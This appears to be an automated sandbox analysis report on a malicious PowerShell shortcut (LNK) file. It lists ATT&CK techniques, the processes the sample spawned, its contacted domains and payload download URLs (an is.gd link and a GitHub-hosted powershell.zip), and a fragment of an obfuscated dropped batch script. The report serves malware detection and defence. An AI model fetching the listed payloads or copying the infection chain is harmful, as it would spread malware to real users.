Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526392 Sample: Windows PowerShell.lnk Startdate: 05/10/2024 Architecture: WINDOWS Score: 100 41 objects.githubusercontent.com 2->41 43 is.gd 2->43 45 github.com 2->45 53 Windows shortcut file (LNK) starts blacklisted processes 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands 2->57 59 6 other signatures 2->59 10 powershell.exe 14 20 2->10         started        signatures3 process4 dnsIp5 47 github.com 140.82.121.4, 443, 49712 GITHUBUS United States 10->47 49 objects.githubusercontent.com 185.199.111.133, 443, 49714 FASTLYUS Netherlands 10->49 51 is.gd 104.25.234.53, 443, 49710, 49711 CLOUDFLARENETUS United States 10->51 37 C:\Users\user\AppData\Local\Temp\.cmd, Unicode 10->37 dropped 63 Windows shortcut file (LNK) starts blacklisted processes 10->63 65 Found suspicious powershell code related to unpacking or dynamic code loading 10->65 15 cmd.exe 1 10->15         started        18 conhost.exe 1 10->18         started        file6 signatures7 process8 signatures9 67 Windows shortcut file (LNK) starts blacklisted processes 15->67 69 Malicious encrypted Powershell command line found 15->69 71 Encrypted powershell cmdline option found 15->71 20 powershell.exe 22 15->20         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        28 69 other processes 15->28 process10 file11 35 C:\Users\user\AppData\...\pbkjdvqy.cmdline, Unicode 20->35 dropped 61 Performs an instant shutdown (NtRaiseHardError) 20->61 30 csc.exe 3 20->30         started        signatures12 process13 file14 39 C:\Users\user\AppData\Local\...\pbkjdvqy.dll, PE32 30->39 dropped 33 cvtres.exe 1 30->33         started        process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Windows PowerShell.lnk14%ReversingLabsBinary.Trojan.Generic
Windows PowerShell.lnk19%VirustotalBrowse
Windows PowerShell.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
github.com0%VirustotalBrowse
is.gd2%VirustotalBrowse
objects.githubusercontent.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
http://is.gd/jwr7JD2%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
https://is.gd/jwr7JD2%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse
https://github.com/user-attachments/files/17251016/powershell.zip0%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.com
140.82.121.4
truefalseunknown
is.gd
104.25.234.53
truefalseunknown
objects.githubusercontent.com
185.199.111.133
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://is.gd/jwr7JDfalseunknown
https://github.com/user-attachments/files/17251016/powershell.zipfalseunknown
https://is.gd/jwr7JDfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://go.micropowershell.exe, 0000004B.00000002.2248209888.000002145E474000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 0000004B.00000002.2267603715.000002146D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2267603715.000002146D9F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Licensepowershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Iconpowershell.exe, 0000004B.00000002.2248209888.000002145F17E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://oneget.orgXpowershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://aka.ms/pscore68powershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000004B.00000002.2248209888.000002145D841000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://github.com/Pester/Pesterpowershell.exe, 0000004B.00000002.2248209888.000002145DA74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://oneget.orgpowershell.exe, 0000004B.00000002.2248209888.000002145EEEC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown

World Map of Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public IPs

IPDomainCountryFlagASNASN NameMalicious
104.25.234.53
is.gdUnited States
13335CLOUDFLARENETUSfalse
140.82.121.4
github.comUnited States
36459GITHUBUSfalse
185.199.111.133
objects.githubusercontent.comNetherlands
54113FASTLYUSfalse

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1526392
Start date and time:2024-10-05 14:50:36 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 12s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:78
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:
Sample name:Windows PowerShell.lnk
Detection:MAL
Classification:mal100.rans.bank.expl.evad.winLNK@131/13@3/3
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 1
Cookbook Comments:
  • Found application associated with file extension: .lnk

Warnings

  • Connection to analysis system has been lost, crash info: Unknown
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

TimeTypeDescription
08:51:28API Interceptor52x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
104.25.234.53http://is.gd/areapersonalenetGet hashmaliciousUnknownBrowse
  • is.gd/areapersonalenet
140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
  • github.com/ssbb36/stv/raw/main/5.mp3
185.199.111.133Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
    DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
      PO-00536.xlsGet hashmaliciousRemcosBrowse
        https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
          https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
            http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
              WW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                  R183nzNa89.exeGet hashmaliciousUnknownBrowse
                    Shipping Documents.xlsGet hashmaliciousRemcosBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      is.gdAmerican-equity Updated Employee sheet .odtGet hashmaliciousHTMLPhisherBrowse
                      • 104.25.233.53
                      Tonincasa Updated Employee sheet .pdfGet hashmaliciousHTMLPhisherBrowse
                      • 104.25.234.53
                      https://www.google.ca/url?q=mySNsytxq5XhxSKOln15&rct=z3NXEeooVKbLBxALR3Qz&sa=t&esrc=TvdsTs6Qdare1rEk2vxo&source=&cd=MQp5nwcHjWG5GNYTYunP&uact=&url=amp/is.gd/DHNFRO%23dmljdGltQHZpY3RpbS5vcmc=Get hashmaliciousHTMLPhisherBrowse
                      • 104.25.233.53
                      http://is.gd/DHNFRO#dmljdGltQHZpY3RpbS5vcmc=Get hashmaliciousHTMLPhisherBrowse
                      • 104.25.234.53
                      http://is.gd/EmlK8CGet hashmaliciousUnknownBrowse
                      • 104.25.234.53
                      http://www.is.gd/g1mDsM/Get hashmaliciousUnknownBrowse
                      • 104.25.233.53
                      http://is.gd/af4MWe?US=937448/Get hashmaliciousUnknownBrowse
                      • 104.25.234.53
                      http://www.is.gd/RHEDa0/Get hashmaliciousUnknownBrowse
                      • 172.67.83.132
                      csmH586n48.pdfGet hashmaliciousUnknownBrowse
                      • 104.25.233.53
                      http://is.gd/pttgoovk6Get hashmaliciousUnknownBrowse
                      • 104.25.233.53
                      github.comRequest For Quotation.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                      • 140.82.121.4
                      https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                      • 140.82.121.6
                      http://ogp.me/ns#Get hashmaliciousUnknownBrowse
                      • 185.199.108.154
                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                      • 140.82.121.4
                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      Quotation#4873920.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.3
                      Quotation#4873920.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      objects.githubusercontent.com8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                      • 185.199.110.133
                      file.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                      • 185.199.109.133
                      SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      SecuriteInfo.com.Win32.MalwareX-gen.27131.14737.exeGet hashmaliciousUnknownBrowse
                      • 185.199.111.133
                      https://us-west-2.protection.sophos.com/?d=r2.dev&u=aHR0cHM6Ly9wdWItOWNhOGJiMGM2NzVmNDFhYWIzODc2ZDhlNWFkZDMxYjIucjIuZGV2L05vdGUuaHRtbCM=&i=NjRiMDExNzU2MjkwN2M0MmM2NTMzYjVi&t=OW04SERhWDAyWmp1WEFOcWFUU2t5Y0JVSGhFSThsNSt0SGl3T2tNZkR5TT0=&h=eb4c9b03d0924a8291fc2550717e1fd7&s=AVNPUEhUT0NFTkNSWVBUSVYbSwqVLPu4gowbNoTM-q0OFozYRd237giKYdXaQtMC6QGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                      • 185.199.109.133
                      https://www.filemail.com/t/NU6GESpWGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                      • 185.199.109.133
                      https://astral.sh/uv/install.ps1Get hashmaliciousUnknownBrowse
                      • 185.199.108.133
                      xmr_linux_amd64 (3).elfGet hashmaliciousXmrigBrowse
                      • 185.199.110.133
                      https://github.com/valinet/ExplorerPatcherGet hashmaliciousUnknownBrowse
                      • 185.199.110.133
                      xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                      • 185.199.111.133

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      FASTLYUSIpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                      • 185.199.109.133
                      Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                      • 199.232.196.209
                      bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                      • 151.101.2.49
                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                      • 185.199.110.133
                      https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
                      • 151.101.129.140
                      [MALICIOUS]_Secured_Doc-[yBv-26104].pdfGet hashmaliciousUnknownBrowse
                      • 151.101.2.137
                      https://clicktracking.yellowbook.com/trackinguserwebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://www.keybag.nl/image/arull.php?7120797967704b5369323074645079557a504c456e4d53532f4b7a79394c4c556c4e7a73684d7a64644c7a732f564b386a524c366b494364454841413d3dmaggie@proctorlane.comGet hashmaliciousHTMLPhisherBrowse
                      • 151.101.66.137
                      survey.pdfGet hashmaliciousPDFPhishBrowse
                      • 199.232.192.193
                      https://href.li/?https://CYT.sprenumen.ru/wJPIeL/#I#Ws-amclean@lwsd.orgGet hashmaliciousTycoon2FABrowse
                      • 151.101.2.137
                      fa5a527b.emlGet hashmaliciousHTMLPhisherBrowse
                      • 151.101.66.137
                      CLOUDFLARENETUSc1#U09a6.exeGet hashmaliciousUnknownBrowse
                      • 188.114.96.3
                      XWorm.exeGet hashmaliciousLummaCBrowse
                      • 188.114.96.3
                      bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                      • 104.21.86.200
                      S4dd5N5VuJ.lnkGet hashmaliciousUnknownBrowse
                      • 172.67.188.77
                      Iv7LiW8Jwu.lnkGet hashmaliciousUnknownBrowse
                      • 172.67.143.87
                      Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 188.114.96.3
                      https://wide-loads.powerappsportals.com/Get hashmaliciousUnknownBrowse
                      • 104.18.2.157
                      https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
                      • 104.18.17.5
                      rfc[1].htmlGet hashmaliciousUnknownBrowse
                      • 172.67.41.60
                      file.exeGet hashmaliciousLummaC, VidarBrowse
                      • 172.67.208.181
                      GITHUBUSRequest For Quotation.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                      • 140.82.121.4
                      https://jhansalazar.weebly.com/Get hashmaliciousUnknownBrowse
                      • 140.82.121.6
                      http://ogp.me/ns#Get hashmaliciousUnknownBrowse
                      • 140.82.114.17
                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                      • 140.82.121.4
                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      URGENT PAYMENT REQUEST.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      Quotation#4873920.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4
                      Quotation#4873920.jsGet hashmaliciousSTRRATBrowse
                      • 140.82.121.4

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      3b5074b1b5d032e5620f69f9f700ff0esj9eYmr725.exeGet hashmaliciousQuasarBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      iOD95iHt4G.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      iOD95iHt4G.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      file.exeGet hashmaliciousCredential FlusherBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      Iv7LiW8Jwu.lnkGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      hkN23TcCdh.exeGet hashmaliciousUnknownBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      Tcbnyqc7Cr.exeGet hashmaliciousDCRatBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133
                      Bukti-Transfer...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      • 140.82.121.4
                      • 104.25.234.53
                      • 185.199.111.133

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\.cmd

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                      Category:modified
                      Size (bytes):132304
                      Entropy (8bit):4.950317998648966
                      Encrypted:false
                      SSDEEP:1536:q27LdLC0AeKaT08u2DP1Znt1NGuOD4chchVLC2D:qA1DfVHOD4chchV+i
                      MD5:A07FCB39B340AD8DEA993A5F5C4D9064
                      SHA1:77D0F76618142BE56ABD231B1296277F3E797DC9
                      SHA-256:EEB86BDD38DC4FA93046F3CC0E443018518B81828D34E5D1E75F3BD9AAB0F8A7
                      SHA-512:3A4BFAC095B40D6EF901F328DD8A807A053190C6812CBA4C1A768D9A7256E8635CD187FF3054BFC951DF18D0E0CD8941E1FAE786650AE98A30447109F76EABE6
                      Malicious:true
                      Preview:..&cls..@echo off..set ucbw=set..:: ........... . ..........., ... . ........... . .........., ..... ........ . ............ ......... . ............ ........ . ..........., ....... ..... .. ..... ............. . ............%ucbw% qmy= ..:: ..... ...., ............ . ...... ........, ... ....... .... ....., .......... .. ...., ........ ... ........ . ......... . ..., ... ....... ...... .... . ..... . ...........%ucbw%%qmy%jxaa==..:: ...... .......... ....., ..... .......... ..... ...... ......... ... ....... . ........... ............, ........ .......... ..... .. .......

                      C:\Users\user\AppData\Local\Temp\RES7AF.tmp

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Oct 5 14:36:05 2024, 1st section name ".debug$S"
                      Category:dropped
                      Size (bytes):1332
                      Entropy (8bit):4.015904538733568
                      Encrypted:false
                      SSDEEP:24:HbFzW9DaGdaHFwKdNeI+ycuZhNuCakSZDPNnqS2d:73GKdw1uluCa3ZpqSG
                      MD5:52EE31550208F2E9D7798FF8792F0840
                      SHA1:C66B5839D884F2CCC2D2CEA21F063E34459F1016
                      SHA-256:A45569C1EF2AFA43264DB92446855F5A32961F47E53F75431165B36D2D8E7688
                      SHA-512:4CAA670C6A521F5A88E10F613B4690D7BA07DF58AFD73579D6FCD5042E1098A75E728EBAF6378C0AD22012EC098C9083C18C6A5C51E8497ABDDCFBFDFD8C10C9
                      Malicious:false
                      Preview:L....N.g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........V....c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP..................(......Rc...}7..........6.......C:\Users\user\AppData\Local\Temp\RES7AF.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.b.k.j.d.v.q.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pmmnvk1.1fc.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4pibzff.mpr.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgu50p1z.eqy.psm1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xf40d02h.aqo.ps1

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.12548759652439
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywCak7YnqqZDPN5Dlq5J:+RI+ycuZhNuCakSZDPNnqX
                      MD5:0C281DE6A7F213BE8952639AE4C17D37
                      SHA1:61439165DD9550C8098A21F1265FE146980AE8CE
                      SHA-256:3B308B1258D6A6ACFEF5DBBBB8B7C1CF9F9DEE883D2167B6C0A8D5AB7E7CCE8D
                      SHA-512:42EA071B7EC88285453DC6A4B59411B66BB9B81B77EB23CAC8CBB7223C80546EDF7739FBFF2F60CD6E30661E528785D3E2164C77660058466C4FD4B99F0B8C35
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.b.k.j.d.v.q.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.b.k.j.d.v.q.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (972), with no line terminators
                      Category:dropped
                      Size (bytes):975
                      Entropy (8bit):5.470697572113314
                      Encrypted:false
                      SSDEEP:24:JVkzomWKDcpzweoEi0gp91x7fKlgHg0eKF2yjahKF2PO6Hd7KF2v6o5wkxQ1:JVyomWKDcpz3o/0gp9zrgmFB+cFX6Hsf
                      MD5:2C592480A51FF7A7D45E4233EF0D7AEE
                      SHA1:FDDF34BB2B397C54521255AE82093DA2938642D7
                      SHA-256:6A7DE1714F4980AFD5CD7BCF889AC569AB62424367BBD3933826CF79BFC22136
                      SHA-512:A91B6DDA179595A43D40E6DF9DB8C7FFE2D4A1ED75E0350675D52B7D450959D502D82CDB1A4C4BA59C4D07661B73E430867FE90212735B4A52E06A5436233D04
                      Malicious:false
